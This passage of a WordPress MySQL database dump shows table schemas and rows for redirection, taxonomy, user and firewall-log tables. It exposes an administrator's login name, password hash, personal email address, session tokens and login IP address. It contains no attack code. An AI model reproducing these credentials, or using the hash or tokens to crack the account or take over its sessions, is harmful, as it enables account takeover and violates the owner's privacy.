INSERT INTO `wp_redirection_groups` VALUES (1,'Redirections',1,1,'enabled',0),(2,'Modified Posts',1,1,'enabled',1);
/*!40000 ALTER TABLE `wp_redirection_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_items`
--

DROP TABLE IF EXISTS `wp_redirection_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_items` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `url` mediumtext NOT NULL,
  `match_url` varchar(2000) DEFAULT NULL,
  `match_data` text DEFAULT NULL,
  `regex` int(11) unsigned NOT NULL DEFAULT 0,
  `position` int(11) unsigned NOT NULL DEFAULT 0,
  `last_count` int(10) unsigned NOT NULL DEFAULT 0,
  `last_access` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `group_id` int(11) NOT NULL DEFAULT 0,
  `status` enum('enabled','disabled') NOT NULL DEFAULT 'enabled',
  `action_type` varchar(20) NOT NULL,
  `action_code` int(11) unsigned NOT NULL,
  `action_data` mediumtext DEFAULT NULL,
  `match_type` varchar(20) NOT NULL,
  `title` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `url` (`url`(191)),
  KEY `status` (`status`),
  KEY `regex` (`regex`),
  KEY `group_idpos` (`group_id`,`position`),
  KEY `group` (`group_id`),
  KEY `match_url` (`match_url`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_items`
--

LOCK TABLES `wp_redirection_items` WRITE;
/*!40000 ALTER TABLE `wp_redirection_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_redirection_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_redirection_logs`
--

DROP TABLE IF EXISTS `wp_redirection_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_logs` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `created` datetime NOT NULL,
  `url` mediumtext NOT NULL,
  `domain` varchar(255) DEFAULT NULL,
  `sent_to` mediumtext DEFAULT NULL,
  `agent` mediumtext DEFAULT NULL,
  `referrer` mediumtext DEFAULT NULL,
  `http_code` int(11) unsigned NOT NULL DEFAULT 0,
  `request_method` varchar(10) DEFAULT NULL,
  `request_data` mediumtext DEFAULT NULL,
  `redirect_by` varchar(50) DEFAULT NULL,
  `redirection_id` int(11) unsigned DEFAULT NULL,
  `ip` varchar(45) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `created` (`created`),
  KEY `redirection_id` (`redirection_id`),
  KEY `ip` (`ip`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_redirection_logs`
--

LOCK TABLES `wp_redirection_logs` WRITE;
/*!40000 ALTER TABLE `wp_redirection_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_redirection_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_smush_dir_images`
--

DROP TABLE IF EXISTS `wp_smush_dir_images`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_smush_dir_images` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `path` text NOT NULL,
  `path_hash` char(32) DEFAULT NULL,
  `resize` varchar(55) DEFAULT NULL,
  `lossy` varchar(55) DEFAULT NULL,
  `error` varchar(55) DEFAULT NULL,
  `image_size` int(10) unsigned DEFAULT NULL,
  `orig_size` int(10) unsigned DEFAULT NULL,
  `file_time` int(10) unsigned DEFAULT NULL,
  `last_scan` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  `meta` text DEFAULT NULL,
  UNIQUE KEY `id` (`id`),
  UNIQUE KEY `path_hash` (`path_hash`),
  KEY `image_size` (`image_size`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_smush_dir_images`
--

LOCK TABLES `wp_smush_dir_images` WRITE;
/*!40000 ALTER TABLE `wp_smush_dir_images` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_smush_dir_images` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (27,1,0),(28,1,0),(29,1,0),(30,1,0),(31,1,0),(32,1,0),(33,1,0),(34,1,0),(35,1,0),(36,1,0),(37,1,0),(38,1,0),(39,1,0),(40,1,0),(41,1,0),(42,1,0),(43,1,0),(44,1,0),(45,1,0),(46,1,0),(47,1,0),(48,1,0),(49,1,0),(50,1,0),(51,1,0),(52,1,0),(53,1,0),(54,1,0),(55,1,0),(56,1,0),(57,1,0),(58,1,0),(59,1,0),(60,1,0),(151,2,0),(152,2,0),(153,2,0),(154,2,0),(155,2,0),(156,2,0),(157,2,0),(159,2,0),(172,2,0),(183,2,0),(198,2,0),(200,1,0),(213,3,0),(213,4,0),(213,5,0),(213,6,0),(213,7,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,35),(2,2,'nav_menu','',0,11),(3,3,'category','',0,1),(4,4,'post_tag','',0,1),(5,5,'post_tag','',0,1),(6,6,'post_tag','',0,1),(7,7,'post_tag','',0,1);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Top','top',0),(3,'Addiction','addiction',0),(4,'rehab centre','rehab-centre',0),(5,'rehab centres','rehab-centres',0),(6,'addiction','addiction',0),(7,'rehab','rehab',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=36 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','dailyjolly'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'locale',''),(11,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(12,1,'wp_user_level','10'),(13,1,'dismissed_wp_pointers','vc_pointers_backend_editor'),(14,1,'show_welcome_panel','1'),(15,1,'session_tokens','a:3:{s:64:\"ab4dcc2559220efa1c4a4744bcaa4bea409dd82e1eb9d3f12f6d31af6e823b97\";a:4:{s:10:\"expiration\";i:1650017263;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36\";s:5:\"login\";i:1649844463;}s:64:\"99ef288f6d22b49cc095ada6e2dfe2dc0880b94fd9e770f8d4bf4d090bb28352\";a:4:{s:10:\"expiration\";i:1650017768;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36\";s:5:\"login\";i:1649844968;}s:64:\"1d9ab111505b8f16da4fc7a70acdb8c8ecd8c9622ef3ac532a7965ab4f70872d\";a:4:{s:10:\"expiration\";i:1650018132;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36\";s:5:\"login\";i:1649845332;}}'),(16,1,'wp_dashboard_quick_press_last_post_id','223'),(17,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"185.175.113.0\";}'),(18,1,'last_login_time','2022-04-13 10:22:12'),(19,1,'wp_user-settings','editor=tinymce&libraryContent=browse&imgsize=full&urlbutton=custom'),(20,1,'wp_user-settings-time','1629449417'),(21,2,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(22,2,'nickname','wordpress'),(23,2,'first_name',''),(24,2,'last_name',''),(25,2,'description',''),(26,2,'rich_editing','true'),(27,2,'comment_shortcuts','false'),(28,2,'admin_color','fresh'),(29,2,'use_ssl','0'),(30,2,'show_admin_bar_front','true'),(31,2,'locale',''),(33,1,'wfls-last-login','1649845332'),(34,1,'wp_yoast_notifications','a:2:{i:0;a:2:{s:7:\"message\";s:341:\"<p>We see that you enabled automatic updates for WordPress. We recommend that you do this for Yoast SEO as well. This way we can guarantee that WordPress and Yoast SEO will continue to run smoothly together. <a href=\"https://www.dailyjolly.co.uk/wp-admin/plugins.php\">Go to your plugins overview to enable auto-updates for Yoast SEO.</a></p>\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:17:\"wpseo-auto-update\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"1\";s:10:\"user_login\";s:23:\"AAD22133312errousGTRF44\";s:9:\"user_pass\";s:34:\"$P$BVFg.FsXLtiMPiMG.4oKd66nVMt81F.\";s:13:\"user_nicename\";s:10:\"dailyjolly\";s:10:\"user_email\";s:23:\"bensykes@bensykes.co.uk\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2017-08-22 07:51:27\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:10:\"dailyjolly\";}s:2:\"ID\";i:1;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:66:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;s:20:\"wpseo_manage_options\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.8;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:1;a:2:{s:7:\"message\";O:61:\"Yoast\\WP\\SEO\\Presenters\\Admin\\Indexing_Notification_Presenter\":3:{s:18:\"\0*\0total_unindexed\";i:149;s:9:\"\0*\0reason\";s:23:\"home_url_option_changed\";s:20:\"\0*\0short_link_helper\";O:38:\"Yoast\\WP\\SEO\\Helpers\\Short_Link_Helper\":2:{s:17:\"\0*\0options_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Options_Helper\":0:{}s:17:\"\0*\0product_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Product_Helper\":0:{}}}s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:13:\"wpseo-reindex\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"1\";s:10:\"user_login\";s:23:\"AAD22133312errousGTRF44\";s:9:\"user_pass\";s:34:\"$P$BVFg.FsXLtiMPiMG.4oKd66nVMt81F.\";s:13:\"user_nicename\";s:10:\"dailyjolly\";s:10:\"user_email\";s:23:\"bensykes@bensykes.co.uk\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2017-08-22 07:51:27\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:10:\"dailyjolly\";}s:2:\"ID\";i:1;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:66:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;s:20:\"wpseo_manage_options\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.8;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),(35,1,'_yoast_wpseo_profile_updated','1650340862');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'AAD22133312errousGTRF44','$P$BVFg.FsXLtiMPiMG.4oKd66nVMt81F.','dailyjolly','bensykes@bensykes.co.uk','','2017-08-22 07:51:27','',0,'dailyjolly');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblockediplog`
--

DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblockediplog`
--

LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0����^','US',12,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0���s�','IT',1,19380,'waf'),('\0\0\0\0\0\0\0\0\0\0���)�','US',22,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0���)�','US',14,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0���)�','US',3,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0���}O','US',17,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0���}O','US',2,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0��\r8�$','US',44,19370,'waf'),('\0\0\0\0\0\0\0\0\0\0��\rZ)�','US',71,19385,'waf'),('\0\0\0\0\0\0\0\0\0\0��&�','KR',1,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0��\n3','US',13,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0��\n3','US',23,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0��y�n','US',2,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0����','US',71,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,19369,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0����','US',2,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0����','US',3,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0��ˇ�','CH',80,19380,'waf'),('\0\0\0\0\0\0\0\0\0\0��ˇ�','CH',94,19384,'waf'),('\0\0\0\0\0\0\0\0\0\0����','JP',7,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0���1','US',8,19382,'waf'),('\0\0\0\0\0\0\0\0\0\0���1','US',80,19385,'waf'),('\0\0\0\0\0\0\0\0\0\0���;]','US',7,19369,'waf'),('\0\0\0\0\0\0\0\0\0\0���;]','US',7,19370,'waf'),('\0\0\0\0\0\0\0\0\0\0���$N','US',79,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0���$N','US',79,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0���$N','US',142,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0���$N','US',10,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0���$N','US',10,19377,'waf'),('\0\0\0\0\0\0\0\0\0\0���@�','US',2,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0��(uSn','US',13,19377,'waf'),('\0\0\0\0\0\0\0\0\0\0��)ؼ\\','US',4,19370,'waf'),('\0\0\0\0\0\0\0\0\0\0��+�z5','SG',8,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0��-Q\'e','US',24,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0��-���','DE',22,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��-��','CZ',1,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0��-��','BD',2,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0��.��f','DE',1,19382,'waf'),('\0\0\0\0\0\0\0\0\0\0��/[.�','AU',4,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0��2`��','US',1,19376,'waf'),('\0\0\0\0\0\0\0\0\0\0��3��','GB',11,19372,'waf'),('\0\0\0\0\0\0\0\0\0\0��3��','GB',6,19373,'waf'),('\0\0\0\0\0\0\0\0\0\0��:�M�','CN',1,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0��;I�','KR',1,19377,'waf'),('\0\0\0\0\0\0\0\0\0\0��>��S','ES',4,19383,'waf'),('\0\0\0\0\0\0\0\0\0\0��>�_�','RU',1,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0��A�\\�','HK',1,19378,'waf'),('\0\0\0\0\0\0\0\0\0\0��B�','US',44,19369,'waf'),('\0\0\0\0\0\0\0\0\0\0��B�','US',22,19370,'waf'),('\0\0\0\0\0\0\0\0\0\0��Jо�','US',4,19385,'waf'),('\0\0\0\0\0\0\0\0\0\0��Jо�','US',6,19386,'waf'),('\0\0\0\0\0\0\0\0\0\0��M�M','DE',1,19375,'waf'),('\0\0\0\0\0\0\0\0\0\0��N���','FR',1,19382,'waf'),('\0\0\0\0\0\0\0\0\0\0��PL3','US',3,19374,'waf'),('\0\0\0\0\0\0\0\0\0\0��PL3','US',3,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0��PL3','US',2,19385,'waf'),('\0\0\0\0\0\0\0\0\0\0��PL3','US',2,19386,'waf'),('\0\0\0\0\0\0\0\0\0\0��PL3','US',1,19387,'waf'),('\0\0\0\0\0\0\0\0\0\0��P���','RU',1,19381,'waf'),('\0\0\0\0\0\0\0\0\0\0��Q�:V','CZ',1,19377,'waf'),('\0\0\0\0\0\0\0\0\0\0��RB(','FR',1,19379,'waf'),('\0\0\0\0\0\0\0\0\0\0��R�{','FR',1,19382,'waf'),('\0\0\0\0\0\0\0\0\0\0��R��','FR',1,19381,'waf'),('\0\0\0\0\0\0\0\0\0\0��R��','ES',16,19384,'waf'),('\0\0\0\0\0\0\0\0\0\0��R��','ES',24,19385,'waf'),('\0\0\0\0\0\0\0\0\0\0��R��','ES',20,19386,'waf'),('\0\0\0\0\0\0\0\0\0\0��T�Wu','DE',1,19381,'waf'),('\0\0\0\0\0\0\0\0\0\0��U�bM','DE',4,19384,'waf'),('\0\0\0\0\0\0\0\0\0\0��U�h�','DE',4,19385,'waf'),('\0\0\0\0\0\0\0\0\0\0��U�v�','DE',3,19360,'waf'),('\0\0\0\0\0\0\0\0\0\0��W���','DE',1,19380,'waf'),('\0\0\0\0\